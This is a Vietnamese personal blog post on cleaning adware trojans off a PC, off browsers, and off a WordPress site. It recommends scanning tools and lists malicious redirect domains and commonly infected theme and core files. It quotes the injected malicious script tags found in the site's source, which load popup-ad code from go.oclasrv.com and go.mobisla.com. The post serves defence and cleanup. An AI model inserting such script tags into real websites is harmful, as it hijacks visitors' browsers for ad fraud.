Cách diệt trojan quảng cáo website-cách diệt trojan quảng cáo trình duyệt

Cách diệt hoàn toàn trojan quảng cáo cho web và máy tính


(Cách diệt trojan quảng cáo website-cách diệt trojan quảng cáo trình duyệt,diệt trojan deloton.com,diệt trojan go.oclasrv.com)

Bài viết này là kinh nghiệm bản thân sau khi làm theo 1 số cách trên mạng, đã áp dụng thành công vào web DragonBallwiki.net, nay chia sẻ để các bạn tham khảo. Loại trojan này có rất nhiều biến thể khác nhau nên tùy từng trường hợp cụ thể mới làm chính xác được, bài viết này sẽ giúp được phần nào.

Tổng quan

Cách diệt trojan quảng cáo website

(Cách diệt trojan quảng cáo website-cách diệt trojan quảng cáo trình duyệt,diệt trojan deloton.com,diệt trojan go.oclasrv.com)

Trojan quảng cáo là 1 loạt các loại adware, malware...có chức năng xâm nhập vào máy tính, vào trình duyệt, vào mã nguồn để thực hiện nhiệm vụ khi khách truy cập nhảy ra các popup vô tội vạ (quảng cáo). Lưu ý rằng đây ko phải là Virus nguy hiểm kiểu ăn file hay làm hỏng win hay gì cả, nó chỉ là lợi dụng trình duyệt, web của mình để nhảy lên các quảng cáo và nguồn thu thì về nó. Mình ngoài việc bị lợi dụng còn rất khó chịu khi các cửa sổ cứ nhảy lên -> làm giảm uy tín web, mất traffic

 

Hoàn cảnh

DragonBallWiki.net thời gian vừa rồi gặp tình trạng là khi ấn vào các bài viết, hoặc ấn vào khoảng trắng web thì nó nhảy ra các popup quảng cáo từ trang web deloton.com rồi chuyển hướng thành đủ các trang landing khác nhau, và vấn đề là nó chả liên quan gì đến nội dung web và cũng ko phải vấn đề mà khách quan tâm (ko thông minh như quảng cáo google)

Cơ chế lây lan và phân biệt Trojan

cách diệt trojan quảng cáo trình duyệt

Sử dụng công cụ quét trực tuyến

Khi bị nhiễm trojan, nó thường sẽ chuyển hướng sang các trang web "trung gian" như: go.pub2srv[.]com, go.mobisla[.]com, go.oclaserver[.com], deloton. com, go.oclasrv.com,  bigpicturepop.com, thepopularlinks.com, codeonclick.com, Onclickads.net 

Sau đó sẽ dẫn đến 1 trang landing quảng cáo 1 cái gì đó không liên quan. Mình ko đủ chuyên môn để hiểu sâu cơ chế lây lan nhưng thường là máy tính bị dẫn đến trình duyệt bị.  Còn thâm nhập vào mã nguồn web là do các lỗ hổng trong mã nguồn, theme, plugin mà ko bản quyền, download lậu các bản null, crack trên mạng.

Một cái nữa là cần phân biệt trojan ở máy tính, ở trình duyệt và ở web là các vị trí khác nhau. Bạn cần phân biệt khi web của bạn bị popup là do trình duyệt hay do bản thân web?Có nhiều cách để kiếm tra:

  • Dùng công cụ Scan web như: https://sitecheck.sucuri.net/ hay https://www.quttera.com/
  • Cài phần mềm Malwareby giới thiệu phía dưới, khi truy cập vào web nào có trojan nó sẽ chặn và cảnh báo
  • Gửi web cho bạn bè ấn nếu bị tức là do web, còn ko tức là do trình duyệt ở máy của bạn

 

GIẢI PHÁP

1) Quét máy tính bằng tool tự động

diệt trojan deloton.com

Các bạn download lần lượt và chạy cả 3 phần mềm có cùng chức năng dưới đây. Mặc dù bài hướng dẫn nói "nếu ko hết thì chạy tiếp phần mềm thứ 2" nhưng mình thấy là thừa còn hơn thiếu cứ chạy hết, bọn nó sẽ bù trừ cho nhau. Thực tế mình chạy phần mềm 1 có rất nhiều trojan, quét hết xong đến phần mềm 2 thấy còn 1/3 , sang đến phần mềm 3 thấy còn 2 con :v. Với mỗi lần chạy và fix thì khởi động lại máy.

Đương nhiên Trojan nó không cài thẳng vào máy như kiểu các phần mềm khác (ổ C:/program), bạn sẽ không thể tìm nó trong mục remove phần mềm, thậm chí là các Tool gỡ phần mềm chuyên dụng. Nó sẽ cài vào bất kì vị trí nào khác trong máy.

MALWAREBYTES

Hướng dẫn sử dụng

Sau khi cài xong, bật phần mềm lên ấn Scan Now

malwarebytes

chờ 1 lúc nó sẽ scan các trojan có trong máy

malwarebytes is scanning for virus adware malware

Nó hiện ra các trojan có trong máy, ấn Quarantine Selected để xóa hết rồi khởi dộng lại máy. Sang cài phần mềm thứ 2

Malwarebytes Quarantine

(Cách diệt trojan quảng cáo website-cách diệt trojan quảng cáo trình duyệt,diệt trojan deloton.com,diệt trojan go.oclasrv.com)

ZEMANA

Hướng dẫn sử dụng

Cài xong mở phần mềm lên ấn Scan

Zemana

Nó quét xong ấn Next để tiến hành xóa trojan khỏi máy. Xong thì khởi động lại, cài phần mềm thứ 3

zemana anti malware

(Cách diệt trojan quảng cáo website-cách diệt trojan quảng cáo trình duyệt,diệt trojan deloton.com,diệt trojan go.oclasrv.com)

ADWCLEANER

Hướng dẫn sử dụng

Cài xong mở phần  mềm lên ấn Scan now

adwcleaner 7.1 remove adware virus malware files

Quét xong ấn Clean & Repair

adwcleaner 7.1 clean and repair

ấn Clean and restart là xong

adwcleaner 7.1 clean and restart

(Cách diệt trojan quảng cáo website-cách diệt trojan quảng cáo trình duyệt,diệt trojan deloton.com,diệt trojan go.oclasrv.com)

 

2) Sửa trình duyệt web

Thật ra khi dùng các tool trên thấy cũng quét đc kha khá rồi vì đôi khi trojan nằm trong máy nó điều khiển các trình duyệt popup ra
Nếu có thời gian và tỉ mẩn, bạn tham khảo thêm cách fix các trình duyệt bằng tay ở bài hướng dẫn này:

Deloton.com virus

(Cách diệt trojan quảng cáo website-cách diệt trojan quảng cáo trình duyệt,diệt trojan deloton.com,diệt trojan go.oclasrv.com)

 

3) Fix ở website

Đây là phần quan trọng nhất

diệt trojan go.oclasrv.com

(Cách diệt trojan quảng cáo website-cách diệt trojan quảng cáo trình duyệt,diệt trojan deloton.com,diệt trojan go.oclasrv.com)

 

Ở trên có cài phần mềm Malwareby, khi bạn vào web có trojan nó sẽ cảnh báo. Ví dụ khi mình vào dragonballwikil.net thì nó báo có trojan go.oclasrv.com
->Mình Ctrl U để xem mã nguồn ở home thì thấy có đoạn code như này được thêm vào:

<script data-cfasync="false" type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1698432"></script><script data-cfasync="false" type="text/javascript" src="//go.mobisla.com/notice.php?p=1698432&interactive=1&pushup=1" async="async"></script>

Về web thì cũng cần có 1 chút kiến thức cơ bản về mã nguồn nhé, biết được các file nằm ở đâu và cách để edit nó

Cơ chế: lợi dụng lỗ hổng mã nguồn thì nó sẽ thêm 1 đoạn code vào các file hiển thị, công việc của ta là tìm các file này và xóa các mã lạ đó đi. Nhưng nhiều khi xóa xong 1 thời gian lại thấy nó hiện lại -> đã có 1 file khác nó là "chủ", khi file kia bị xóa thì nó lại tạo lại -> cần tìm file chủ này và xóa đi.

Ví dụ:

  • 1 số file hiển thị: index.php , header.php, single.php
  • 1 số file “chủ” (trong thư mục theme): functions.php,
  • 1 số file khác ở thư mục wp-include: wp-vcd.php , class.wp.php , post.php, wp-tmp.php, 

Vậy bạn cần vào các file này, mở nó lên và tìm đến các đoạn code lạ và xóa đi. Có thể tìm kiếm bằng tên các trang web nêu trên sẽ ra đoạn code lạ đó, ví dụ: go.oclasrv.com, go.mobisla.com, deloton.com....

Chú ý: Đây chỉ là liệt kê 1 số file điển hình, chứ tùy trường hợp trojan nó lây vào file nào thì chịu

Cách nhanh hơn: Nếu vấn đề chỉ nằm ở mã nguồn và theme,plugin thì cách đơn giản nhất là:

  • Download mã nguồn mới về up đè lên cái cũ
  • Mua theme, plugin bản quyền về up đè lên cái cũ, hoặc chí ít cũng dow lại theme, plugin từ các nguồn có uy tín (ko bản quyền thì nguy cơ vẫn rất cao)

Kết quả: sau khi mình xóa code lạ ở file funtion.php ở theme cùng việc up lại mã nguồn thì thấy web đã hết.

 

Trojan nhiễm vào cơ sở dữ liệu (database?)

(Cách diệt trojan quảng cáo website-cách diệt trojan quảng cáo trình duyệt,diệt trojan deloton.com,diệt trojan go.oclasrv.com)

 

Ca này nặng mình chịu, thậm chí còn chả biết là database của mình có nhiễm ko. Tuy nhiên đến đây rồi thì cũng giới thiệu 1 số plugin tối ưu hóa database, nên cài và dùng thử tất cả vì mỗi cái lại có điểm mạnh riêng:

  • Advanced Database Cleaner : Cái này có khá nhiều tùy chọn tối ưu database nhưng mà bản có phí thì mới cho phép chọn riêng các database dư thừa để xóa
  • WP-Optimize: Plugin này lâu đời và có uy tín, chức năng miễn phí của nó cũng khá hiệu quả rồi
KẾT LUẬN

Kết quả hình ảnh cho protect website

Tóm gọn lại các việc cần làm:

  • Cài các tool để nó quét và diện trojan trong máy, trình duyệt
  • Có điều kiện thì mua theme, plugin bản quyền up đè lên, hoặc chí ít là down lại từ các nguồn khác, không thì tự tìm bằng tay trong các file nói trên và xóa code lạ đi

Viết bài này cảm thấy tâm trạng thực sự tốt vì đã tự fix được trojan của wiki. Chứ lúc đầu hỏi mấy nhà chuyên môn báo giá toàn vài triệu/domain nản quá 🙁

CHÚC CÁC BẠN THÀNH CÔNG!

Nguồn tham khảo:

fixyourbrowser.comwww.2-spyware.com, WordPress Support

(17)


Bạn hãy để lại comment:

Leave a Reply

Your email address will not be published. Required fields are marked *